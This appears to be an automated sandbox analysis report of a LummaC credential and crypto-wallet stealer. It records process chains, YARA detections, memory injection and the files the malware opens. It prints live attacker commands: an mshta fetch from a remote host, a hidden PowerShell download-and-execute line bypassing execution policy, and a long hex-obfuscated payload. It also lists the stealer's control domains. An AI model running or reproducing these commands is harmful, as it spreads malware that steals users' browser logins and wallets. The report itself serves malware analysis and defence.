Source: powershell.exe, 00000003.00000002.56226903813.00000000081E6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006DBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57195069753.0000000007040000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57276916511.00000218857F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

API call chain: ExitProcess graph end node

graph_8-13478

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_0043C1F0 LdrInitializeThunk,

8_2_0043C1F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_2576.amsi.csv, type: OTHER
Source: Yara match	File source: amsi32_8336.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8336, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe	String found in binary or memory: rapeflowwj.lat
Source: powershell.exe	String found in binary or memory: crosshuaht.lat
Source: powershell.exe	String found in binary or memory: sustainskelet.lat
Source: powershell.exe	String found in binary or memory: aspecteirs.lat
Source: powershell.exe	String found in binary or memory: energyaffai.lat
Source: powershell.exe	String found in binary or memory: necklacebudi.lat
Source: powershell.exe	String found in binary or memory: discokeyus.lat
Source: powershell.exe	String found in binary or memory: grannyejh.lat
Source: powershell.exe	String found in binary or memory: surmisehotte.click

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe "C:\WINDOWS\system32\mshta.exe" https://savecoupons.shop/singl6.mp4	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cdncn($pbla){return -split ($pbla -replace '..', '0x$& ')};$lhmk = cdncn('a3aa4480ff655084e70adc84d9ea6341178cca80af8469b12931f471af827f36734f649e4ffc481465f7a8a2bfa75783c467f30497bc4b11e481c2530797b14fc2f5b368b22016a880e652482e6475cf0dc1a66ea8f0136b2bbc629a30ceb860956fd49362aec1529369252fc290e7464876570eb817d8e9b180d541376938391a342371d8eee7c40b429917ed3bae7546609a8390b670a9097cb2f4371f68c266424fc610c85c530e515400b772d500ae542f889f9a970f0c0884f9dab2f28bcd379149c803b7f17eec6c69e622ba1f8b13247111cf1ccb79b4798b7dfb6aec68a8f963d9fe6ac1af1987a9fb2a16b0f82b9ba594307adeea757f6284f08ddb1a3bfa98b3bea493c2c605a6ebf27bfdf963bef1c0f74c61bb82b80e6a9b2f61e44ac18908a15ac5ca52e0d0b5e7eca5c629f9ce088140c02670105b1c1eb4c39c449ded3a8e098e14832e1159b7bfe7f74012f5ab28a812bd11b0830216ec8e5f537ad27755cad7efbdaeb4c5e6235233729039aca656a57fb2d8afef2960e070779a4cf1bd35291b7033d4618b7fbec36b04bdd9cc6d825285fe8e9b14f783b7f3071abe49f6be8dfe02d7e8b0a4e5fead8570b4049362bc3ff9599bef08430dea16a596c8e8aa8febe25a7d3aef1a0f1d2a47644c59b18a95c4e955b6a747c547978a1471bd6004b1ecd6443abc8058ed921c2a97c1449ae376c36fb9da81ed841f3f4437f69417cef04acd68c114464aa5755262e3e2a8804f5d1f018c94308e1802e6c59864386df18ac9d197902c482a57d3531fcb49886b15046af78768f80014de486e0e78d49561586c41c0e653a2a6bb84f1d7467bb73bf1e6ff73e92540fcc809aa398e26b9a708706094d4a5382850472779ad17b69c066b29caae8b04f605e50cc29e8480dd31e8db08e7717139d5a19ee210804ad16ca1445a2eac4d7c66209914c86431f3b5174ece947bebd88f70d5299d63c267d52d0ea77d645ebcdd39a110138c082cd3c09ca8aa75e9a53a689d0576c332ee23948ae9eccce522dacc38b3581f9c71cfc27c56f81f9cb5c9d938e2a35c15a5e7ce4c1db70b003bf969ab7131336f933529cea80a9facb8c911fda0c526986d4e8fb5fddda4c0df5762be3783933e8e0ab3d712cd3b563309bdb03a5460e12d1c34126a4f89191e1c34197f7eb35212baa7e9d32890ed00618dfed16c97f2f709899caea84c4aa2a7b5371a5faca3d115e12be56d873196999184299302ad235c87c226989d2cbeba4d82e6c270f060d4165de6962a5077677a4796a0fc82e05aab1272f50397568327381a2d529a9466317ab38d192e338bda14927384df7ccbaff9e8594748246285b3d8aa54c12d8c53351947654ea52f7b1a29724a48c14a1d4fcad70edc954b5d82a932ac8ff8a2dcb79d1c10c7458b14a40215396e306c046b7dd83b83b6eb6ffae26ff38de7e40f09de9fdd00ec21f89b23814ebbd7e5b2a5aa1a2c0cc6814e4c15d127261b29720a28f854382cc18092685037c23b14ed11e90915036d385992f5d948f9775bb8b9c159c5c39c63e68221bf35a5518331151c4c0bacb7b58f5a8b9df32bd1c3c4828d65896c8dc07b8002c812e8fed5f8fe86a6138586b9dc1f40f9a4e967d8e87cd674633563f6514e3557d8efde3a0247843cca695357e876d6f77804dcb5599681da62faed5d52ba3ab823a2d2219c0783c18fbd3fc8897a07b5fea483ff46af5f23eb91e20e31a520b6566b846c91212decbb9f2e6972adcab84a64d2dc6ebfa7b5758a915c3a978589c931cefe5b8868b0256407fa6b78e518e0b7d7a8042bd51a46f9297518c6f4eb262d6525b016fb7d858136fcbf7af2bc0d0488befd0ced9a5213ff3ff1b7b481cb6454cc9c929edf1779eefb9842b90ed62994ae6bd859c94c0821f219c5a77e00c97981c5b1f965e0977f82c3ec531c34
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cdncn($pbla){return -split ($pbla -replace '..', '0x$& ')};$lhmk = cdncn('a3aa4480ff655084e70adc84d9ea6341178cca80af8469b12931f471af827f36734f649e4ffc481465f7a8a2bfa75783c467f30497bc4b11e481c2530797b14fc2f5b368b22016a880e652482e6475cf0dc1a66ea8f0136b2bbc629a30ceb860956fd49362aec1529369252fc290e7464876570eb817d8e9b180d541376938391a342371d8eee7c40b429917ed3bae7546609a8390b670a9097cb2f4371f68c266424fc610c85c530e515400b772d500ae542f889f9a970f0c0884f9dab2f28bcd379149c803b7f17eec6c69e622ba1f8b13247111cf1ccb79b4798b7dfb6aec68a8f963d9fe6ac1af1987a9fb2a16b0f82b9ba594307adeea757f6284f08ddb1a3bfa98b3bea493c2c605a6ebf27bfdf963bef1c0f74c61bb82b80e6a9b2f61e44ac18908a15ac5ca52e0d0b5e7eca5c629f9ce088140c02670105b1c1eb4c39c449ded3a8e098e14832e1159b7bfe7f74012f5ab28a812bd11b0830216ec8e5f537ad27755cad7efbdaeb4c5e6235233729039aca656a57fb2d8afef2960e070779a4cf1bd35291b7033d4618b7fbec36b04bdd9cc6d825285fe8e9b14f783b7f3071abe49f6be8dfe02d7e8b0a4e5fead8570b4049362bc3ff9599bef08430dea16a596c8e8aa8febe25a7d3aef1a0f1d2a47644c59b18a95c4e955b6a747c547978a1471bd6004b1ecd6443abc8058ed921c2a97c1449ae376c36fb9da81ed841f3f4437f69417cef04acd68c114464aa5755262e3e2a8804f5d1f018c94308e1802e6c59864386df18ac9d197902c482a57d3531fcb49886b15046af78768f80014de486e0e78d49561586c41c0e653a2a6bb84f1d7467bb73bf1e6ff73e92540fcc809aa398e26b9a708706094d4a5382850472779ad17b69c066b29caae8b04f605e50cc29e8480dd31e8db08e7717139d5a19ee210804ad16ca1445a2eac4d7c66209914c86431f3b5174ece947bebd88f70d5299d63c267d52d0ea77d645ebcdd39a110138c082cd3c09ca8aa75e9a53a689d0576c332ee23948ae9eccce522dacc38b3581f9c71cfc27c56f81f9cb5c9d938e2a35c15a5e7ce4c1db70b003bf969ab7131336f933529cea80a9facb8c911fda0c526986d4e8fb5fddda4c0df5762be3783933e8e0ab3d712cd3b563309bdb03a5460e12d1c34126a4f89191e1c34197f7eb35212baa7e9d32890ed00618dfed16c97f2f709899caea84c4aa2a7b5371a5faca3d115e12be56d873196999184299302ad235c87c226989d2cbeba4d82e6c270f060d4165de6962a5077677a4796a0fc82e05aab1272f50397568327381a2d529a9466317ab38d192e338bda14927384df7ccbaff9e8594748246285b3d8aa54c12d8c53351947654ea52f7b1a29724a48c14a1d4fcad70edc954b5d82a932ac8ff8a2dcb79d1c10c7458b14a40215396e306c046b7dd83b83b6eb6ffae26ff38de7e40f09de9fdd00ec21f89b23814ebbd7e5b2a5aa1a2c0cc6814e4c15d127261b29720a28f854382cc18092685037c23b14ed11e90915036d385992f5d948f9775bb8b9c159c5c39c63e68221bf35a5518331151c4c0bacb7b58f5a8b9df32bd1c3c4828d65896c8dc07b8002c812e8fed5f8fe86a6138586b9dc1f40f9a4e967d8e87cd674633563f6514e3557d8efde3a0247843cca695357e876d6f77804dcb5599681da62faed5d52ba3ab823a2d2219c0783c18fbd3fc8897a07b5fea483ff46af5f23eb91e20e31a520b6566b846c91212decbb9f2e6972adcab84a64d2dc6ebfa7b5758a915c3a978589c931cefe5b8868b0256407fa6b78e518e0b7d7a8042bd51a46f9297518c6f4eb262d6525b016fb7d858136fcbf7af2bc0d0488befd0ced9a5213ff3ff1b7b481cb6454cc9c929edf1779eefb9842b90ed62994ae6bd859c94c0821f219c5a77e00c97981c5b1f965e0977f82c3ec531c34			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: powershell.exe, 00000008.00000002.57437193107.0000000004C66000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 9160, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: powershell.exe, 00000008.00000002.57431193652.000000000061B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: powershell.exe, 00000003.00000002.56225694102.0000000007590000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
